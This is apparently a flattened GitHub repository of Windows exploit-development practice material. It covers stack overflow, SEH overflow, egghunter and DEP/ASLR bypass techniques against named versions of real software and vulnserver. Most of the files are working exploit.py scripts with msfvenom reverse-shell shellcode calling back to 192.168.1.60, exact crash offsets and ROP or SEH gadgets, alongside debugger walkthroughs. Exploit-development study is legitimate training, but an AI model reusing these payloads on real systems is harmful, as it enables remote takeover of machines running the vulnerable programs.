├── 1.stack_overflow ├── DiskSorterEnterprise_9.5.12 │ ├── README.md │ └── exploit.py ├── EasyRMtoMP3Converter │ ├── README.md │ └── exploit.py ├── README.md ├── brainpain │ ├── README.md │ ├── brainpan.exe │ └── exploit.py └── dostackbufferoverflowgood │ ├── README.md │ ├── dostackbufferoverflowgood.exe │ └── exploit.py ├── 2.seh-overflow ├── DocPrintPro_8.0 │ ├── README.md │ └── exploit.py ├── EFSEasyChatServer_3.1 │ ├── README.md │ └── exploit.py ├── EasyFileSharingWebServer_7.2 │ ├── README.md │ └── exploit.py ├── README.md └── vulnserver-GMON │ ├── README.md │ ├── exploit.py │ └── vulnserver.exe ├── 3.egghunter ├── README.md ├── Sysax_5.53 │ ├── README.md │ └── exploit.py ├── TFTPServer_1.4 │ ├── README.md │ └── exploit.py ├── Vulnserver_GMON │ ├── README.md │ └── exploit.py ├── Vulnserver_KSTET │ ├── README.md │ └── exploit.py └── freeFTPd_1.0.10 │ ├── README.md │ └── exploit.py ├── 5.dep_bypass ├── CloudMe_1.11.2 │ ├── README.md │ ├── exploit.py │ ├── exploit_virtualalloc.py │ └── exploit_wpm.py ├── Disk_Sorter_Enterprise_9.5.12 │ └── exploit_virtualalloc.py ├── EasyFileSharingWebServer_7.2 │ ├── README.md │ ├── exploit_virtualprotect.py │ └── exploit_wpm.py ├── EasyRMtoMp3_2.7.3.700 │ ├── README.md │ └── exploit.py ├── Mini-streamRM-MP3Converter_3.1.2.1 │ ├── README.md │ └── exploit.py ├── README.md ├── VUPlayer_2.49 │ ├── README.md │ └── exploit_virtualprotect.py └── Vulnserver_TRUN │ ├── README.md │ ├── exploit.py │ └── exploit2.py ├── 6.asrl_enabled ├── Easy File Sharing_7.2 │ ├── README.md │ └── exploit.py ├── QuoteDB │ ├── README.md │ └── exploit.py ├── README.md ├── Rainbow2 │ ├── README.md │ └── exploit_wpm.py ├── Sync_Breeze_version_10.0.28 │ ├── README.md │ ├── exploit.py │ └── exploit_with_writeprocessmemory.py └── custom │ ├── README.md │ ├── exploit_wpm.py │ └── server.exe ├── 7.format_strings └── README.md └── README.md /1.stack_overflow/DiskSorterEnterprise_9.5.12/README.md: 
-------------------------------------------------------------------------------- 1 | # DiskSorterEnterprise_9.5.12 2 | Downloaded from: https://www.exploit-db.com/exploits/41771 3 | 4 | Vulnerable function: Command -> Import Command 5 | 6 | ## Initial Crash 7 | ```py 8 | import os,struct 9 | 10 | CRASH_LEN = 5000 # change me 11 | 12 | payload = "A" * CRASH_LEN 13 | 14 | #FILE 15 | file='\n' 16 | 17 | f = open('Exploit.xml', 'w') 18 | f.write(file) 19 | f.close() 20 | ``` 21 | -------------------------------------------------------------------------------- /1.stack_overflow/DiskSorterEnterprise_9.5.12/exploit.py: -------------------------------------------------------------------------------- 1 | import os,struct 2 | 3 | CRASH_LEN = 5000 # change me 4 | OFFSET = 1536 5 | 6 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x27' EXITFUNC=thread 7 | shellcode = b"" 8 | shellcode += b"\xb8\x73\x01\x43\xaf\xda\xd0\xd9\x74\x24\xf4" 9 | shellcode += b"\x5f\x29\xc9\xb1\x52\x83\xef\xfc\x31\x47\x0e" 10 | shellcode += b"\x03\x34\x0f\xa1\x5a\x46\xe7\xa7\xa5\xb6\xf8" 11 | shellcode += b"\xc7\x2c\x53\xc9\xc7\x4b\x10\x7a\xf8\x18\x74" 12 | shellcode += b"\x77\x73\x4c\x6c\x0c\xf1\x59\x83\xa5\xbc\xbf" 13 | shellcode += b"\xaa\x36\xec\xfc\xad\xb4\xef\xd0\x0d\x84\x3f" 14 | shellcode += b"\x25\x4c\xc1\x22\xc4\x1c\x9a\x29\x7b\xb0\xaf" 15 | shellcode += b"\x64\x40\x3b\xe3\x69\xc0\xd8\xb4\x88\xe1\x4f" 16 | shellcode += b"\xce\xd2\x21\x6e\x03\x6f\x68\x68\x40\x4a\x22" 17 | shellcode += b"\x03\xb2\x20\xb5\xc5\x8a\xc9\x1a\x28\x23\x38" 18 | shellcode += b"\x62\x6d\x84\xa3\x11\x87\xf6\x5e\x22\x5c\x84" 19 | shellcode += b"\x84\xa7\x46\x2e\x4e\x1f\xa2\xce\x83\xc6\x21" 20 | shellcode += b"\xdc\x68\x8c\x6d\xc1\x6f\x41\x06\xfd\xe4\x64" 21 | shellcode += b"\xc8\x77\xbe\x42\xcc\xdc\x64\xea\x55\xb9\xcb" 22 | shellcode += b"\x13\x85\x62\xb3\xb1\xce\x8f\xa0\xcb\x8d\xc7" 23 | shellcode += b"\x05\xe6\x2d\x18\x02\x71\x5e\x2a\x8d\x29\xc8" 24 | shellcode += 
b"\x06\x46\xf4\x0f\x68\x7d\x40\x9f\x97\x7e\xb1" 25 | shellcode += b"\xb6\x53\x2a\xe1\xa0\x72\x53\x6a\x30\x7a\x86" 26 | shellcode += b"\x3d\x60\xd4\x79\xfe\xd0\x94\x29\x96\x3a\x1b" 27 | shellcode += b"\x15\x86\x45\xf1\x3e\x2d\xbc\x92\x80\x1a\xbf" 28 | shellcode += b"\x5e\x69\x59\xbf\x84\xec\xd4\x59\xd2\xfe\xb0" 29 | shellcode += b"\xf2\x4b\x66\x99\x88\xea\x67\x37\xf5\x2d\xe3" 30 | shellcode += b"\xb4\x0a\xe3\x04\xb0\x18\x94\xe4\x8f\x42\x33" 31 | shellcode += b"\xfa\x25\xea\xdf\x69\xa2\xea\x96\x91\x7d\xbd" 32 | shellcode += b"\xff\x64\x74\x2b\x12\xde\x2e\x49\xef\x86\x09" 33 | shellcode += b"\xc9\x34\x7b\x97\xd0\xb9\xc7\xb3\xc2\x07\xc7" 34 | shellcode += b"\xff\xb6\xd7\x9e\xa9\x60\x9e\x48\x18\xda\x48" 35 | shellcode += b"\x26\xf2\x8a\x0d\x04\xc5\xcc\x11\x41\xb3\x30" 36 | shellcode += b"\xa3\x3c\x82\x4f\x0c\xa9\x02\x28\x70\x49\xec" 37 | shellcode += b"\xe3\x30\x69\x0f\x21\x4d\x02\x96\xa0\xec\x4f" 38 | shellcode += b"\x29\x1f\x32\x76\xaa\x95\xcb\x8d\xb2\xdc\xce" 39 | shellcode += b"\xca\x74\x0d\xa3\x43\x11\x31\x10\x63\x30" 40 | 41 | payload = b"A" * 1536 42 | payload += struct.pack("\n' 51 | 52 | f = open('Exploit.xml', 'wb') 53 | f.write(file) 54 | f.close() 55 | -------------------------------------------------------------------------------- /1.stack_overflow/EasyRMtoMP3Converter/README.md: -------------------------------------------------------------------------------- 1 | # EasyRMtoMP3Converter 2 | 3 | Downloaded from: https://www.exploit-db.com/exploits/10374 4 | 5 | ## Initial Crash 6 | 7 | ```py 8 | #!/usr/bin/python 9 | 10 | file = "crash1.m3u" 11 | f = open(file , "w") 12 | 13 | CRASH_LEN = 30000 # change me 14 | 15 | junk = "A" * CRASH_LEN 16 | f.write(junk) 17 | f.close() 18 | ``` 19 | -------------------------------------------------------------------------------- /1.stack_overflow/EasyRMtoMP3Converter/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import struct 3 | 4 | file = 
"crash1.m3u" 5 | f = open(file , "wb") 6 | 7 | CRASH_LEN = 30000 # change me 8 | 9 | #\x00\x09\x0a 10 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x09\x0a' EXITFUNC=thread 11 | shellcode = b"" 12 | shellcode += b"\xba\xfc\xc7\xd1\xe3\xdb\xdc\xd9\x74\x24\xf4" 13 | shellcode += b"\x5d\x29\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e" 14 | shellcode += b"\x03\xa9\xc9\x33\x16\xad\x3e\x31\xd9\x4d\xbf" 15 | shellcode += b"\x56\x53\xa8\x8e\x56\x07\xb9\xa1\x66\x43\xef" 16 | shellcode += b"\x4d\x0c\x01\x1b\xc5\x60\x8e\x2c\x6e\xce\xe8" 17 | shellcode += b"\x03\x6f\x63\xc8\x02\xf3\x7e\x1d\xe4\xca\xb0" 18 | shellcode += b"\x50\xe5\x0b\xac\x99\xb7\xc4\xba\x0c\x27\x60" 19 | shellcode += b"\xf6\x8c\xcc\x3a\x16\x95\x31\x8a\x19\xb4\xe4" 20 | shellcode += b"\x80\x43\x16\x07\x44\xf8\x1f\x1f\x89\xc5\xd6" 21 | shellcode += b"\x94\x79\xb1\xe8\x7c\xb0\x3a\x46\x41\x7c\xc9" 22 | shellcode += b"\x96\x86\xbb\x32\xed\xfe\xbf\xcf\xf6\xc5\xc2" 23 | shellcode += b"\x0b\x72\xdd\x65\xdf\x24\x39\x97\x0c\xb2\xca" 24 | shellcode += b"\x9b\xf9\xb0\x94\xbf\xfc\x15\xaf\xc4\x75\x98" 25 | shellcode += b"\x7f\x4d\xcd\xbf\x5b\x15\x95\xde\xfa\xf3\x78" 26 | shellcode += b"\xde\x1c\x5c\x24\x7a\x57\x71\x31\xf7\x3a\x1e" 27 | shellcode += b"\xf6\x3a\xc4\xde\x90\x4d\xb7\xec\x3f\xe6\x5f" 28 | shellcode += b"\x5d\xb7\x20\x98\xa2\xe2\x95\x36\x5d\x0d\xe6" 29 | shellcode += b"\x1f\x9a\x59\xb6\x37\x0b\xe2\x5d\xc7\xb4\x37" 30 | shellcode += b"\xf1\x97\x1a\xe8\xb2\x47\xdb\x58\x5b\x8d\xd4" 31 | shellcode += b"\x87\x7b\xae\x3e\xa0\x16\x55\xa9\x0f\x4e\x54" 32 | shellcode += b"\x15\xf8\x8d\x56\x7f\x7d\x18\xb0\x15\x6d\x4d" 33 | shellcode += b"\x6b\x82\x14\xd4\xe7\x33\xd8\xc2\x82\x74\x52" 34 | shellcode += b"\xe1\x73\x3a\x93\x8c\x67\xab\x53\xdb\xd5\x7a" 35 | shellcode += b"\x6b\xf1\x71\xe0\xfe\x9e\x81\x6f\xe3\x08\xd6" 36 | shellcode += b"\x38\xd5\x40\xb2\xd4\x4c\xfb\xa0\x24\x08\xc4" 37 | shellcode += b"\x60\xf3\xe9\xcb\x69\x76\x55\xe8\x79\x4e\x56" 38 | shellcode += 
b"\xb4\x2d\x1e\x01\x62\x9b\xd8\xfb\xc4\x75\xb3" 39 | shellcode += b"\x50\x8f\x11\x42\x9b\x10\x67\x4b\xf6\xe6\x87" 40 | shellcode += b"\xfa\xaf\xbe\xb8\x33\x38\x37\xc1\x29\xd8\xb8" 41 | shellcode += b"\x18\xea\xf8\x5a\x88\x07\x91\xc2\x59\xaa\xfc" 42 | shellcode += b"\xf4\xb4\xe9\xf8\x76\x3c\x92\xfe\x67\x35\x97" 43 | shellcode += b"\xbb\x2f\xa6\xe5\xd4\xc5\xc8\x5a\xd4\xcf" 44 | 45 | payload = b"A" * 26043 46 | payload += struct.pack(" Add URL 6 | 7 | ## Initial Crash 8 | ```py 9 | #!/usr/bin/python 10 | 11 | file = "file.txt" 12 | f = open(file , "w") 13 | 14 | CRASH_LEN = 10000 # change me 15 | 16 | junk = "A" * CRASH_LEN 17 | f.write(junk) 18 | f.close() 19 | ``` 20 | -------------------------------------------------------------------------------- /2.seh-overflow/DocPrintPro_8.0/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import struct 3 | 4 | file = "file.txt" 5 | f = open(file , "wb") 6 | 7 | CRASH_LEN = 10000 # change me 8 | OFFSET = 3876 9 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f' EXITFUNC=thread 10 | shellcode = b"" 11 | shellcode += b"\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81" 12 | shellcode += b"\x73\x13\xbc\x93\x25\x97\x83\xeb\xfc\xe2\xf4" 13 | shellcode += b"\x40\x7b\xa7\x97\xbc\x93\x45\x1e\x59\xa2\xe5" 14 | shellcode += b"\xf3\x37\xc3\x15\x1c\xee\x9f\xae\xc5\xa8\x18" 15 | shellcode += b"\x57\xbf\xb3\x24\x6f\xb1\x8d\x6c\x89\xab\xdd" 16 | shellcode += b"\xef\x27\xbb\x9c\x52\xea\x9a\xbd\x54\xc7\x65" 17 | shellcode += b"\xee\xc4\xae\xc5\xac\x18\x6f\xab\x37\xdf\x34" 18 | shellcode += b"\xef\x5f\xdb\x24\x46\xed\x18\x7c\xb7\xbd\x40" 19 | shellcode += b"\xae\xde\xa4\x70\x1f\xde\x37\xa7\xae\x96\x6a" 20 | shellcode += b"\xa2\xda\x3b\x7d\x5c\x28\x96\x7b\xab\xc5\xe2" 21 | shellcode += b"\x4a\x90\x58\x6f\x87\xee\x01\xe2\x58\xcb\xae" 22 | shellcode += 
b"\xcf\x98\x92\xf6\xf1\x37\x9f\x6e\x1c\xe4\x8f" 23 | shellcode += b"\x24\x44\x37\x97\xae\x96\x6c\x1a\x61\xb3\x98" 24 | shellcode += b"\xc8\x7e\xf6\xe5\xc9\x74\x68\x5c\xcc\x7a\xcd" 25 | shellcode += b"\x37\x81\xce\x1a\xe1\xfb\x16\xa5\xbc\x93\x4d" 26 | shellcode += b"\xe0\xcf\xa1\x7a\xc3\xd4\xdf\x52\xb1\xbb\x6c" 27 | shellcode += b"\xf0\x2f\x2c\x92\x25\x97\x95\x57\x71\xc7\xd4" 28 | shellcode += b"\xba\xa5\xfc\xbc\x6c\xf0\xc7\xec\xc3\x75\xd7" 29 | shellcode += b"\xec\xd3\x75\xff\x56\x9c\xfa\x77\x43\x46\xb2" 30 | shellcode += b"\xfd\xb9\xfb\xe5\x3f\xbd\xaf\x4d\x95\xbc\x89" 31 | shellcode += b"\xa0\x1e\x5a\xf9\x35\xc1\xeb\xfb\xbc\x32\xc8" 32 | shellcode += b"\xf2\xda\x42\x39\x53\x51\x9b\x43\xdd\x2d\xe2" 33 | shellcode += b"\x50\xfb\xd5\x22\x1e\xc5\xda\x42\xd4\xf0\x48" 34 | shellcode += b"\xf3\xbc\x1a\xc6\xc0\xeb\xc4\x14\x61\xd6\x81" 35 | shellcode += b"\x7c\xc1\x5e\x6e\x43\x50\xf8\xb7\x19\x96\xbd" 36 | shellcode += b"\x1e\x61\xb3\xac\x55\x25\xd3\xe8\xc3\x73\xc1" 37 | shellcode += b"\xea\xd5\x73\xd9\xea\xc5\x76\xc1\xd4\xea\xe9" 38 | shellcode += b"\xa8\x3a\x6c\xf0\x1e\x5c\xdd\x73\xd1\x43\xa3" 39 | shellcode += b"\x4d\x9f\x3b\x8e\x45\x68\x69\x28\xc5\x8a\x96" 40 | shellcode += b"\x99\x4d\x31\x29\x2e\xb8\x68\x69\xaf\x23\xeb" 41 | shellcode += b"\xb6\x13\xde\x77\xc9\x96\x9e\xd0\xaf\xe1\x4a" 42 | shellcode += b"\xfd\xbc\xc0\xda\x42" 43 | 44 | 45 | payload = b"A" * OFFSET 46 | payload += struct.pack(" !teb 25 | TEB at 002e3000 26 | ExceptionList: 00edec94 27 | StackBase: 00ee0000 28 | StackLimit: 00edd000 29 | SubSystemTib: 00000000 30 | FiberData: 00001e00 31 | ArbitraryUserPointer: 00000000 32 | Self: 002e3000 33 | EnvironmentPointer: 00000000 34 | ClientId: 0000196c . 
000021bc 35 | RpcHandle: 00000000 36 | Tls Storage: 007f02b0 37 | PEB Address: 002df000 38 | LastErrorValue: 0 39 | LastStatusValue: c000000d 40 | Count Owned Locks: 0 41 | HardErrorMode: 0 42 | ``` 43 | Now walk the chain: dump the `_EXCEPTION_REGISTRATION_RECORD` that `ExceptionList` points to and follow `Next` until you reach the record you overwrote. In the output below the first record belongs to ntdll (its handler is `ExecuteHandler2`), and its `Next` (0x00edffcc) is the overwritten one: there `Next` = BBBB is nSEH and `Handler` = CCCC is SEH. 44 | ```py 45 | 0:003> dt _EXCEPTION_REGISTRATION_RECORD 00edec94 46 | ntdll!_EXCEPTION_REGISTRATION_RECORD 47 | +0x000 Next : 0x00edffcc _EXCEPTION_REGISTRATION_RECORD 48 | +0x004 Handler : 0x77ec5b10 _EXCEPTION_DISPOSITION ntdll!ExecuteHandler2+0 49 | 50 | 0:003> db 0x00edffcc 51 | 00edffcc 42 42 42 42 43 43 43 43-01 02 03 04 05 06 07 08 BBBBCCCC........ 52 | 00edffdc 09 0a 0b 0c 0d 0e 0f 10-11 12 13 14 15 16 17 18 ................ 53 | 00edffec 19 1a 1b 1c 1d 1e 1f 20-21 22 23 24 25 26 27 28 ....... !"#$%&'( 54 | 00edfffc 29 2a 2b 2c ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? )*+,?? 55 | ``` 56 | 4. Find a POP POP RET with mona and put its address in SEH. The gadget must live in a module that was not compiled with SafeSEH (and, for a reliable exploit, one that is not ASLR/rebased); mona's `seh` command already drops SafeSEH modules, and `-cpb` must list every bad character you found, not only NULL. 57 | ```py 58 | !py mona seh -cpb '\x00' 59 | ``` 60 | 1. If you find one, go to 5. 61 | 2. Otherwise look for an alternative that returns into your buffer, such as ADD ESP,XX followed by RET. 62 | 3. If every usable address contains a NULL byte, read https://dl.packetstormsecurity.net/papers/bypass/bypassing-nullbyte.pdf 63 | 64 | 5. Overwrite nSEH with a short jump over the SEH address: `EB 06` jumps 6 bytes past the end of the 2-byte instruction, i.e. over the two padding bytes and the 4-byte handler address, landing 8 bytes from the start of nSEH. 65 | ```py 66 | nasm > jmp short 8 67 | 00000000 EB06 68 | ``` 69 | 6. Check how much room is left after SEH for the shellcode. The `??` bytes at 00ee0000 in the dump above show that the buffer already reaches StackBase, so in that case there is almost no space past SEH and you have to jump back into the start of the buffer instead. 70 | 1. 
If you have it, insert the shellcode and pop the calc 71 | ```py 72 | crash = b"A"*junk 73 | nSEH = b"\xeb\x06\x90\x90" #jump 8 bytes 74 | SEH = struct.pack(" add sp, 0x86c 88 | 00000000 6681C46C08 add sp,0x86c 89 | 90 | 91 | inputBuffer = b"A" * 124 92 | inputBuffer+= pack(" push esp 103 | \x54 104 | nasm > pop eax 105 | \x58 106 | nasm > add ax, 0x5bd 107 | 00000000 6605BD05 add ax,0x5bd 108 | nasm > jmp eax 109 | \xff\xe0 110 | 111 | buffer = shellcode 112 | buffer += b"A"*(2495-len(shellcode)) 113 | buffer += b"\xeb\x06\x90\x90" #nseh 114 | buffer += pack(" jmp 0x6 ; nop ; nop (jump over eip into short shellcode part below) 123 | buf += pack(" pop ecx ; pop ecx ; ret 124 | buf += b"\xb8\xc0\xf8\xff\xff" # mov eax, 0xfffff8c0 (redirect execution to top of buffer [shellcode]) 125 | buf += b"\xf7\xd8" # neg eax 126 | buf += b"\x01\xc4" # add esp, eax 127 | buf += b"\xff\xe4" # jmp esp 128 | buf += b"C" * 33 # required to trigger the seh overwrite rather than another crash 129 | ``` 130 | 131 | ## Resources 132 | 1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ 133 | 2. https://epi052.gitlab.io/notes-to-self/blog/2020-05-18-osce-exam-practice-part-three/ 134 | 3. https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/seh-based-buffer-overflow 135 | 4. 
https://fuzzysecurity.com/tutorials/expDev/3.html 136 | -------------------------------------------------------------------------------- /2.seh-overflow/vulnserver-GMON/README.md: -------------------------------------------------------------------------------- 1 | # Vulnserver - GMON Command 2 | 3 | ## Initial Crash 4 | 5 | ```py 6 | import struct 7 | import socket 8 | 9 | 10 | TARGET_IP = "127.0.0.1" 11 | TARGET_PORT = 9999 12 | target = (TARGET_IP, TARGET_PORT) 13 | 14 | 15 | VULNSRVR_CMD = b"GMON /.../" # change me 16 | CRASH_LEN = 5011 # change me 17 | 18 | payload = VULNSRVR_CMD 19 | payload += b"A" * CRASH_LEN 20 | 21 | with socket.create_connection(target) as sock: 22 | sock.recv(512) 23 | 24 | sent = sock.send(payload) 25 | print(f"sent {sent} bytes") 26 | ``` 27 | -------------------------------------------------------------------------------- /2.seh-overflow/vulnserver-GMON/exploit.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import socket 3 | 4 | 5 | TARGET_IP = "127.0.0.1" 6 | TARGET_PORT = 9999 7 | target = (TARGET_IP, TARGET_PORT) 8 | 9 | 10 | VULNSRVR_CMD = b"GMON /.../" # change me 11 | CRASH_LEN = 5011 # change me 12 | OFFSET = 3546 13 | 14 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00' EXITFUNC=thread 15 | 16 | shellcode = b"" 17 | shellcode += b"\xba\xfc\xc7\xd1\xe3\xdb\xdc\xd9\x74\x24\xf4" 18 | shellcode += b"\x5d\x29\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e" 19 | shellcode += b"\x03\xa9\xc9\x33\x16\xad\x3e\x31\xd9\x4d\xbf" 20 | shellcode += b"\x56\x53\xa8\x8e\x56\x07\xb9\xa1\x66\x43\xef" 21 | shellcode += b"\x4d\x0c\x01\x1b\xc5\x60\x8e\x2c\x6e\xce\xe8" 22 | shellcode += b"\x03\x6f\x63\xc8\x02\xf3\x7e\x1d\xe4\xca\xb0" 23 | shellcode += b"\x50\xe5\x0b\xac\x99\xb7\xc4\xba\x0c\x27\x60" 24 | shellcode += b"\xf6\x8c\xcc\x3a\x16\x95\x31\x8a\x19\xb4\xe4" 25 | shellcode += b"\x80\x43\x16\x07\x44\xf8\x1f\x1f\x89\xc5\xd6" 26 | shellcode += 
b"\x94\x79\xb1\xe8\x7c\xb0\x3a\x46\x41\x7c\xc9" 27 | shellcode += b"\x96\x86\xbb\x32\xed\xfe\xbf\xcf\xf6\xc5\xc2" 28 | shellcode += b"\x0b\x72\xdd\x65\xdf\x24\x39\x97\x0c\xb2\xca" 29 | shellcode += b"\x9b\xf9\xb0\x94\xbf\xfc\x15\xaf\xc4\x75\x98" 30 | shellcode += b"\x7f\x4d\xcd\xbf\x5b\x15\x95\xde\xfa\xf3\x78" 31 | shellcode += b"\xde\x1c\x5c\x24\x7a\x57\x71\x31\xf7\x3a\x1e" 32 | shellcode += b"\xf6\x3a\xc4\xde\x90\x4d\xb7\xec\x3f\xe6\x5f" 33 | shellcode += b"\x5d\xb7\x20\x98\xa2\xe2\x95\x36\x5d\x0d\xe6" 34 | shellcode += b"\x1f\x9a\x59\xb6\x37\x0b\xe2\x5d\xc7\xb4\x37" 35 | shellcode += b"\xf1\x97\x1a\xe8\xb2\x47\xdb\x58\x5b\x8d\xd4" 36 | shellcode += b"\x87\x7b\xae\x3e\xa0\x16\x55\xa9\x0f\x4e\x54" 37 | shellcode += b"\x15\xf8\x8d\x56\x7f\x7d\x18\xb0\x15\x6d\x4d" 38 | shellcode += b"\x6b\x82\x14\xd4\xe7\x33\xd8\xc2\x82\x74\x52" 39 | shellcode += b"\xe1\x73\x3a\x93\x8c\x67\xab\x53\xdb\xd5\x7a" 40 | shellcode += b"\x6b\xf1\x71\xe0\xfe\x9e\x81\x6f\xe3\x08\xd6" 41 | shellcode += b"\x38\xd5\x40\xb2\xd4\x4c\xfb\xa0\x24\x08\xc4" 42 | shellcode += b"\x60\xf3\xe9\xcb\x69\x76\x55\xe8\x79\x4e\x56" 43 | shellcode += b"\xb4\x2d\x1e\x01\x62\x9b\xd8\xfb\xc4\x75\xb3" 44 | shellcode += b"\x50\x8f\x11\x42\x9b\x10\x67\x4b\xf6\xe6\x87" 45 | shellcode += b"\xfa\xaf\xbe\xb8\x33\x38\x37\xc1\x29\xd8\xb8" 46 | shellcode += b"\x18\xea\xf8\x5a\x88\x07\x91\xc2\x59\xaa\xfc" 47 | shellcode += b"\xf4\xb4\xe9\xf8\x76\x3c\x92\xfe\x67\x35\x97" 48 | shellcode += b"\xbb\x2f\xa6\xe5\xd4\xc5\xc8\x5a\xd4\xcf" 49 | 50 | payload = VULNSRVR_CMD 51 | payload += shellcode 52 | payload += b"A" * (OFFSET - len(shellcode)) 53 | payload += struct.pack(" Enable SSH port 5 | 6 | ## Initial Crash 7 | ```py 8 | import paramiko,os,sys 9 | 10 | TARGET_IP = "127.0.0.1" 11 | TARGET_PORT = 22 12 | target = (TARGET_IP, TARGET_PORT) 13 | 14 | CRASH_LEN = 10000 # change me 15 | 16 | payload = b"A" * CRASH_LEN 17 | 18 | transport = paramiko.Transport(target) 19 | transport.connect(username = payload, password = "test") 20 | 
transport.close() 21 | ``` 22 | -------------------------------------------------------------------------------- /3.egghunter/Sysax_5.53/exploit.py: -------------------------------------------------------------------------------- 1 | import paramiko,os,sys 2 | import struct 3 | 4 | TARGET_IP = "127.0.0.1" 5 | TARGET_PORT = 22 6 | target = (TARGET_IP, TARGET_PORT) 7 | 8 | #\x00\x3a 9 | 10 | CRASH_LEN = 10000 # change me 11 | OFFSET = 9208 # 5000 + 4208 12 | 13 | egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x63\x30\x64\x33\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7" 14 | 15 | #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.60 LPORT=6789 -f python -v shellcode -b '\x00\x3a' EXITFUNC=thread 16 | shellcode = b"" 17 | shellcode += b"\xdb\xd1\xb8\x8f\x2f\xfe\x3d\xd9\x74\x24\xf4" 18 | shellcode += b"\x5a\x31\xc9\xb1\x52\x31\x42\x17\x83\xc2\x04" 19 | shellcode += b"\x03\xcd\x3c\x1c\xc8\x2d\xaa\x62\x33\xcd\x2b" 20 | shellcode += b"\x03\xbd\x28\x1a\x03\xd9\x39\x0d\xb3\xa9\x6f" 21 | shellcode += b"\xa2\x38\xff\x9b\x31\x4c\x28\xac\xf2\xfb\x0e" 22 | shellcode += b"\x83\x03\x57\x72\x82\x87\xaa\xa7\x64\xb9\x64" 23 | shellcode += b"\xba\x65\xfe\x99\x37\x37\x57\xd5\xea\xa7\xdc" 24 | shellcode += b"\xa3\x36\x4c\xae\x22\x3f\xb1\x67\x44\x6e\x64" 25 | shellcode += b"\xf3\x1f\xb0\x87\xd0\x2b\xf9\x9f\x35\x11\xb3" 26 | shellcode += b"\x14\x8d\xed\x42\xfc\xdf\x0e\xe8\xc1\xef\xfc" 27 | shellcode += b"\xf0\x06\xd7\x1e\x87\x7e\x2b\xa2\x90\x45\x51" 28 | shellcode += b"\x78\x14\x5d\xf1\x0b\x8e\xb9\x03\xdf\x49\x4a" 29 | shellcode += b"\x0f\x94\x1e\x14\x0c\x2b\xf2\x2f\x28\xa0\xf5" 30 | shellcode += b"\xff\xb8\xf2\xd1\xdb\xe1\xa1\x78\x7a\x4c\x07" 31 | shellcode += b"\x84\x9c\x2f\xf8\x20\xd7\xc2\xed\x58\xba\x8a" 32 | shellcode += b"\xc2\x50\x44\x4b\x4d\xe2\x37\x79\xd2\x58\xdf" 33 | shellcode += b"\x31\x9b\x46\x18\x35\xb6\x3f\xb6\xc8\x39\x40" 34 | shellcode += b"\x9f\x0e\x6d\x10\xb7\xa7\x0e\xfb\x47\x47\xdb" 35 | shellcode += 
b"\xac\x17\xe7\xb4\x0c\xc7\x47\x65\xe5\x0d\x48" 36 | shellcode += b"\x5a\x15\x2e\x82\xf3\xbc\xd5\x45\x3c\xe8\xd4" 37 | shellcode += b"\xa9\xd4\xeb\xd6\xcb\xa1\x65\x30\x81\xb9\x23" 38 | shellcode += b"\xeb\x3e\x23\x6e\x67\xde\xac\xa4\x02\xe0\x27" 39 | shellcode += b"\x4b\xf3\xaf\xcf\x26\xe7\x58\x20\x7d\x55\xce" 40 | shellcode += b"\x3f\xab\xf1\x8c\xd2\x30\x01\xda\xce\xee\x56" 41 | shellcode += b"\x8b\x21\xe7\x32\x21\x1b\x51\x20\xb8\xfd\x9a" 42 | shellcode += b"\xe0\x67\x3e\x24\xe9\xea\x7a\x02\xf9\x32\x82" 43 | shellcode += b"\x0e\xad\xea\xd5\xd8\x1b\x4d\x8c\xaa\xf5\x07" 44 | shellcode += b"\x63\x65\x91\xde\x4f\xb6\xe7\xde\x85\x40\x07" 45 | shellcode += b"\x6e\x70\x15\x38\x5f\x14\x91\x41\xbd\x84\x5e" 46 | shellcode += b"\x98\x05\xa4\xbc\x08\x70\x4d\x19\xd9\x39\x10" 47 | shellcode += b"\x9a\x34\x7d\x2d\x19\xbc\xfe\xca\x01\xb5\xfb" 48 | shellcode += b"\x97\x85\x26\x76\x87\x63\x48\x25\xa8\xa1" 49 | 50 | payload = b"c0d3c0d3" #8 bytes 51 | payload += shellcode 52 | payload += b"A" * (OFFSET - 100 - 8 - len(shellcode)) 53 | payload += b"\x90" * (100 - len(egghunter)) 54 | payload += egghunter 55 | payload += struct.pack(" 1000 74 | edx += rop_nop 75 | edx += rop_nop 76 | edx += rop_nop 77 | edx += rop_nop 78 | 79 | 80 | #EBX {DONE} - 81 | ebx = pack("\n' 144 | 145 | f = open('Exploit.xml', 'wb') 146 | f.write(file) 147 | f.close() 148 | -------------------------------------------------------------------------------- /5.dep_bypass/EasyFileSharingWebServer_7.2/README.md: -------------------------------------------------------------------------------- 1 | # Easy File Sharing Web Server 7.2 - DEP Enabled manually 2 | 3 | Downloaded from: https://www.exploit-db.com/exploits/44522 4 | 5 | ## Initial Crash 6 | ```py 7 | import socket 8 | import os 9 | import sys 10 | import struct 11 | 12 | ip = "127.0.0.1" 13 | port = 80 14 | 15 | #\x0a\x0d\x20\x25\x2f\x5c 16 | 17 | CRASH_LEN = 5000 # change me 18 | OFFSET = 4061 # change me 19 | 20 | payload = b"A" * OFFSET 21 | payload += 
